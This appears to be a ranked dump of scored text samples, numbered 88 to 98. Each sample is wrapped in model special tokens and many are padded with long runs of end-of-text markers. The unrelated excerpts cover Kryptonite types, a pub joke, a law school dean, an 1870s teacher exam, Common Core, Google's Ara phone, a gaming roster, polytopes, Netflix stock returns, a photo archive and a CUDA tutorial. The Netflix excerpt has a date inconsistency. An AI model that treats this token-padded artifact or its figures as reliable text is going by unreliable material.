+================================================================================ +Rank = 88; Score = 380928.0 +<|begin_of_text|>Kryptonite Chart + +Forms of Kryptonite from Superman comics 1949-2013 + +Source : Wikipedia + +: Wikipedia Legend : Length of bar is how long since their debut in comics, i.e. gold Kryptonite was introduced in 1962 so its bar is 54 years × 10 = 540 pixels long. + +: Length of bar is how long since their debut in comics, i.e. gold Kryptonite was introduced in 1962 so its bar is 54 years × 10 = 540 pixels long. Assumptions : If I couldn't figure out the colour, I assumed it was green. Jewel colours come from this image. + +: If I couldn't figure out the colour, I assumed it was green. Jewel colours come from this image. Tools: Perl, ImageMagick, Photoshop + +Periwinkle [2013] + +Orange [2007] + +Black [2005] + +Pink [2003] + +Kryptonite-X [1994] + +Slow [1981] + +Red-Green-Gold [1967] + +Magno-Kryptonite [1966] + +Red-Gold [1965] + +Red-Green1 [1965] + +Bizarro Red [1964] + +Jewel [1964] + +Silver [1963] + +Red-Green-Blue-Gold [1963] + +Gold [1962] + +Red-Green2 [1961] + +White [1960] + +Blue [1960] + +X-Kryptonite [1960] + +Anti-Kryptonite [1959] + +Red [1958] + +Green [1949] + +1,2 — There were two unrelated stories which both featured Red-Green Kryptonite.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 89; Score = 380928.0 +<|begin_of_text|>Suppose there are six friends in a pub. The first one says, ‘My glass is half empty, time for another one.’ The second one says, ‘My glass is half full, I’m OK for now.’ The third one says, ‘There’s a long line at the bar, let’s wait a moment.’ The fourth one says, ‘We’re going to wait anyway, so we might as well get up there now. Let’s order two rounds and get really wasted while we’re at it.’ The fifth one gets up and leaves, because he’s not in the mood to argue, wait, or get wasted. And the sixth downs everyone’s drinks, while they’re discussing what to do next. + +The moral of the story? The pessimist always wants more, the optimist is annoyingly content, the realist is just annoying, the cynic stirs shit up, the quitter is irrelevant, and the opportunist has all the fun. + +So the next time you go out for a drink, remember to argue less and have more fun, because if you don’t, someone else will. At your expense.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 90; Score = 378880.0 +<|begin_of_text|>Page 2 of 4 + +From a macroscopic view, Mitchell was everything Barbara Snyder could want in a law school dean hired during the great law-school market crash. + +Shortly after arriving, he did meet-and-greets with faculty members — something previous deans had never done. He personally visited big law firms that had hired Case graduates, introducing himself and lobbying partners to give his grads a shot. He helped Case tally a record fundraising year at the law school. + +Mitchell consciously cut class sizes. His first year, 190 new students enrolled. In 2012, that became 165. Last fall, 104. But fewer students didn't mean less money. The dean established strong connections to institutions in China, which brought in students who would pay the full annual tuition (currently $46,000 for J.D. students), whereas in-country candidates rarely pay full price. + +He helped reverse CWRU's previously tumbling place in the U.S. News rankings. While the system is almost universally panned as arbitrary, a school's rankings can have dire consequences and significant rewards, and Mitchell knew how to game the system. One important factor: the peer assessment rankings, which might be why Mitchell penned a widely discussed Nov. 2012 New York Times op-ed entitled, "Law School is Worth the Money," in which he chastised those who argued against the lofty tuition tag for an education in a struggling industry. Journalists might have roundly panned it, but those people don't contribute to the peer assessment rankings in the U.S. News report. It worked: CWRU climbed to No. 64 last year, up four spots from 2012. + +He also developed a new curriculum that will be installed this fall, and which was widely praised by the law community, emphasizing practical experience for the Case law students. + +From the top down, Mitchell's rein looked to be off to auspicious beginnings. He was working long hours, traveling and putting in the effort previous deans had not, sources said. But that wasn't the full picture. + +*** + +The law students who will walk across the stage of Severance Hall next week to receive their diplomas have the most colorful stories about Lawrence Mitchell. A lot of them come from the days before classes even started during their first years together. + +"During orientation week that first year, the school had organized events at various bars downtown to kind of get to know everyone in the class," says a third-year law student. "There was this one at Pickwick and Fro +================================================================================ +Rank = 91; Score = 370688.0 +<|begin_of_text|>Fraser McBurney + +2016-10-03 18:01:02 -0400 + +they should go back to school grade 8 + +Consider the following, a certification examination for prospective teachers, prepared by the Examiners of Teachers for the Public Schools in Zanesville, Ohio, in the late 1870s: + +English Grammar. + +1. Analyze the following and parse words in italics + +I cannot tell if to depart in silence, + +Or bitterly to speak in your reproof, + +Best fitteth my degree or your condition. + +2. Write the following in prose, and parse the verb awaits: + +The boast of heraldry, the pomp of power, And all that beauthy, all that wealth e’er gave, + +Awaits alike th’ inevitable hour: The paths of glory lead but to the grave. + +3. Give a brief example of a compound and a complex sentence. Give the rule for the use of the subjunctive mood. 4. Define and give the etymology of verb, prounoun, conjunction and adverb. Give example of a defective, an auxillary, an impersonal and a redudant verb. How many kinds of prounous are there? Give examples of each. + +5. Prior has the following sentence. State it if be good grammar. If not, why? It it be, parse the word than: + +Thou art a girl as much brighter than her, + +As he is a poet sublimer than me. + +6. Give rule for forming plural of nouns ending in “y,” with examples. Give plurals of staff, radius, miasma, Miss White, rendezvous, talisman, loaf, grief, seraph, Mussulman, forceps, spoonful, who, beef, s, x, 6, and madam. Also give the singulars of kine, ashes, banditi [sic], swine, animalcula. 7. Compare chief, much, former, far, forth, next, round, up, ill, full. 8. Give the feminines of abbot, earl, duke, lad, marquis, hero, tiger, nephew, testator, bachelor, wizard, and ox. 9. Write the past tense and past participle of these verbs: + +Lay, Seek, Sit, Get, Dare, + +Thrive, Lie, Set, Light, Loose, + +Fly, Flee, Chide, Overflow, Catch, + + +================================================================================ +Rank = 92; Score = 368640.0 +<|begin_of_text|>Common Core Is Pretty Dumb + +Check out this problem: + +If that isn't big enough on your screen here, hit the twitchy link to get a bigger picture. + +What they're asking kids to do is this: Rather than simply memorize the fact that seven plus seven equals fourteen, they're training kids to recognize possible shortcuts or easier paths to computation. If a kid realizes a seven is made up of 3 plus four, and remembers that three plus seven equals ten, then he can "simplify" the problem as ten plus four, which gives fourteen. + +Here's the problem: The shortcut/easier path of computation is actually more complicated than just learning that seven plus seven equals fourteen. + +This is Cargo Cult stuff. They did the same thing with their new innovations in Whole Word learning (reading a word at a glance), when they got rid of Phonics (sounding a word out, letter by letter), and doomed a generation to being bad readers. + +Here's the Cargo Cult part: + +Professional Highly-Educated Education Researchers noted that high-level early readers were usually just identifying words at a glance -- reading in a "whole word" way. While kids using Phonics read more slowly. Phonics kids were slower readers and struggled with it more. + +So hey -- let's stop teaching kids this slow method of reading called Phonics and just teach them "Whole Word" reading!!! Win, win, win!!! It's easier for the students, and even easier for the teachers, as they don't have to teach the step-by-step Phonics method of reading. They can just say the word "horse" is horse and keep saying it until these stupid kids start learning that "horse" means horse. + +Here's the problem: This is Cargo Cult mneliaty. Yes, the high-lanrneig, early-raednig kids are in fact using the Wlohe Wrod raenidg mhoted, just as you, reading that gibberish I just wrote, employed Whole Word reading -- looking at the first and last letters of the word and using context and years and years of experience in how the written language works, and what words are expected to come in which place in a sentence to read, fairly easily, a bunch of misspelled words as the words I intended. + +But the high-learning, early-reading kids are only doing that because they started reading earlier than the other kids. All kids -- including the early readers -- go through the Phonics phase. One of my earliest recollections (maybe +================================================================================ +Rank = 93; Score = 366592.0 +<|begin_of_text|>Share + +Previous Next 1 of 5 + +Google engineer Rafa Camargo demonstrated just how easy it is to create your very own Ara phone with components of your choosing. The frame, which is known as the “endo” is set up for multiple module components that slide easily into the frame. He added a speaker, the processor, and battery live onstage, before powering the device up. The Ara phone booted quickly, running the latest version of Android. + +Camargo then launched the camera app, even though he hadn’t yet installed the camera module, and the Ara phone told him that no camera was available to use. He quickly flipped over the phone and slid the camera module in while the phone was on. Immediately, the phone recognized that the camera was enabled, and Camargo took a photo of the cheering audience with the device. + +This marks the first time a Project Ara phone has been demoed live taking a photo, and it proves Google’s claim that Ara is indeed a reality that will hit the streets soon. Camargo concluded, saying that the next Ara developers conference will be announced soon, at which point we will learn more about the future of Google’s first modular phone. + +Based on what we saw at the conference, it seems likely that Ara will hit the streets sooner rather than later. It’s just a matter of which streets the phone reaches, and whether customers take to the idea of an infinitely upgradeable phone.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 94; Score = 364544.0 +<|begin_of_text|>Registered: 81 + +Check-In: 51 + +# Login CheckIn Place 1 Sziky (Sziky) YES 2 gNs.I-trutaCz (LRM)trutaCz) YES 3 ifu.eonzerg (Innovacion) YES 4 Terroru (LaGFree.TerrOr) YES 4 5 SAfinA (SAfinA[AoV]) YES 6 6 SiriusSera (Sirius..Sera) YES 6 7 ifu.zaraki (sas.ZaRaki) YES 8 8 BOSS.anfod (Boss.anfod) YES 8 9 TTF (TrYTooFaSTTer) YES 12 10 iFU.OctZergMK (OctZerg[PaiN]) YES 12 11 justin4377 (Brain[Pain]) YES 12 12 AMLAcZ (aFF]AMLAcZ[) YES 12 13 Sero (sb.sero) YES 16 14 cryoc (ifu.cryoc) YES 16 15 dsaqwe (dsaqwe) YES 16 16 dredredre (dredredre) YES 16 17 Wallace (Wallace[BG]) YES 24 18 Lancerx (lancerx) YES 24 19 chrh (fr)chrh) YES 24 20 hasurar (hasurar) YES 24 21 MiG.Largo (reps)Largo) YES 24 22 radley (Radek_z_[KDV]) YES 24 23 letu (fr.d2) YES 24 24 detroydus (ofsize) YES 24 25 BSt.Meleagrr (iwl-meleagrr) YES 32 26 Swarmie (inswarmwetrust) YES 32 27 ZuluNatioN (aFF]ZuluNatiON) YES 32 28 Flisk (Flisk) YES 32 29 TheMarine (TheMarine[BG]) YES 32 30 espi.cho (espi.cho) YES 32 31 Zarek (s.a-zarek) YES 32 32 floladriblere (floladriblere) YES 32 33 Mewka (Mewka[AoV]) YES 48 34 rusty23456 ( +================================================================================ +Rank = 95; Score = 360448.0 +<|begin_of_text|>In 8-dimensional geometry, there are 256 uniform polytopes with B 8 symmetry. There are two regular forms, the 8-orthoplex, and 8-cube with 16 and 256 vertices respectively. The 8-demicube is added with half the symmetry. + +They can be visualized as symmetric orthographic projections in Coxeter planes of the B 8 Coxeter group, and other subgroups. + +Graphs [ edit ] + +Symmetric orthographic projections of these 256 polytopes can be made in the B 8, B 7, B 6, B 5, B 4, B 3, B 2, A 7, A 5, A 3, Coxeter planes. A k has [k+1] symmetry, and B k has [2k] symmetry. + +These 256 polytopes are each shown in these 10 symmetry planes, with vertices and edges drawn, and vertices colored by the number of overlapping vertices in each projective position. + +References [ edit ]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 96; Score = 360448.0 +<|begin_of_text|>Netflix Inc. (NFLX) is a video streaming giant that provides more than 100 million users with syndicated as well as original TV shows and movies. Since its humble beginnings as a mail-order movie and TV show delivery service in 1997, the company has come a long way, effectively killing its biggest competitor Blockbuster Entertainment. Netflix went public on May 23, 2002, and an investment of $990 on Netflix's initial public offering, or IPO, date of May 23, 2002, would have generated over $310,000 after stock splits. that's a gain of 31,260% + +Early Investment in Netflix + +If you invested $990 right after Netflix's IPO, assuming you purchased each share of Netflix at its IPO price of $15, you would have 66 shares. Netflix did not continue higher; instead, it traded in a downtrend until early October 2002, where it hit a low of $4.85. But things turned around for the company and the early investors. + +2004 Two-for-One Netflix Stock Split + +On Feb. 11, 2004, Netflix closed at $71.96 per share. On Feb. 12, 2004, Netflix issued a two-for-one stock split, so those 66 shares would double to become 132 shares. On Feb. 12, 2005, Netflix closed at $37.30 per share. The investment of $990 would have been worth $4923.60, a return on investment, ROI, of 397%. + +Thereafter, Netflix had its ups and downs but overall the stock kept climbing crossing one price milestone after another. + +Source: FactSet + +2015 Seven-for-One Netflix Stock Split + +Nearly 11 years later, Netflix reported its quarterly earnings and shares made a new all-time high. The company was announced another stock split, this time, a seven-for-one stock split, on July 15, 2015. On July 15, 2015, your 132 shares would become 924 shares. On the date of the stock split, Netflix closed at $98.13 per share. The total position was worth $90,672.12 at the close, a 9058% increase over the initial investment amount. + +Present-Day Value From a Netflix IPO Investment<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 97; Score = 358400.0 +<|begin_of_text|>Random Image: Where was this picture taken? + +Show another! + +Corrections, comments, and permission requests should be sent to bwallach@ou.edu, the photographer and captioner, who is at the Department of Geography and Environmental Sustainability, University of Oklahoma. + +Additions in 2018 include Micronesia (Pohnpei), Zimbabwe (Great Zimbabwe and Road to Masvingo), Australia (Uluru/Ayers Rock, Long Way to Broken Hill, and Broken Hill), and Peru (Cusco, Ollamtaytambo, Pisac, and Hydrophilia, which is to say Tambomachay, Tipon, and Moray). + +Additions in 2017 included Argentina, Australia (Newman, Kalgoorlie), Brazil (except Manaus, 1984), Northern India (Darjeeling and Cherrapunji), Peninsular India (Ootacamund), Indonesia (Bali Again), Mauritius, New Zealand (Dunedin and Port Chalmers), Senegal, South Africa (Augrabies Falls), and Western United States (Oahu and Honolulu). + +Additions in 2016 include Australia (Perth and Fremantle), Brazil (except Manaus, 1984), Northern India (Darjeeling and Cherrapunji), Peninsular India (Ootacamund), Mauritius, and New Zealand (Dunedin and Port Chalmers). + +Additions in 2015 included New Zealand (except Dunedin and Port Chalmers) and Nigeria (Abuja, Ibadan, Lagos, and Oshogbo). + +Additions in 2014 included the Eastern U.S. (Central Pennsylvania), Northern India (Delhi additions of Paharganj, St. James Church, and Nizamuddin), the UK (Birmingham), Zimbabwe (Bulawayo), and South Africa (Durban, Pietermaritzburg, Port Elizabeth, and Grahamstown). + +Additions in 2013 included Poland (Warsaw and Krakow), Ghana (Accra, Cape Coast, Elmina), South Africa (Western Cape), Malawi (Blantyre, Limbe, Zomba, Lilongwe), the Czech Republic (Cesky Krumlov), Botswana (Gaborone), and Peninsular India (Chennai). + +Additions in 2012 included China (Macao, Shantou, Shanghai Checkup), India (Diu and Diu Fort, Hampi), +================================================================================ +Rank = 98; Score = 356352.0 +<|begin_of_text|>0. List of contents + +1. Requirements + +Basic knowledge about C programming + +CUDA supported device (CUDA GPU list) + +Installed CUDA SDK + +Eclipse/nvidia nsight (nsight recommended) + +2. Goal + +The aim of this article is to get acquainted with bilinear interpolation technique and implement demo program which is going to scale given input image using nvidia CUDA SDK. The concept of interpolation is not explained here. + +3. Optimus (hybrid graphics card) + +What if I have CUDA compatibile device as a secondary graphics card (optimus)? + +First of all (if you haven’t done it yet) install Bumblebee deamon. + +It’s available on many popular distros, for 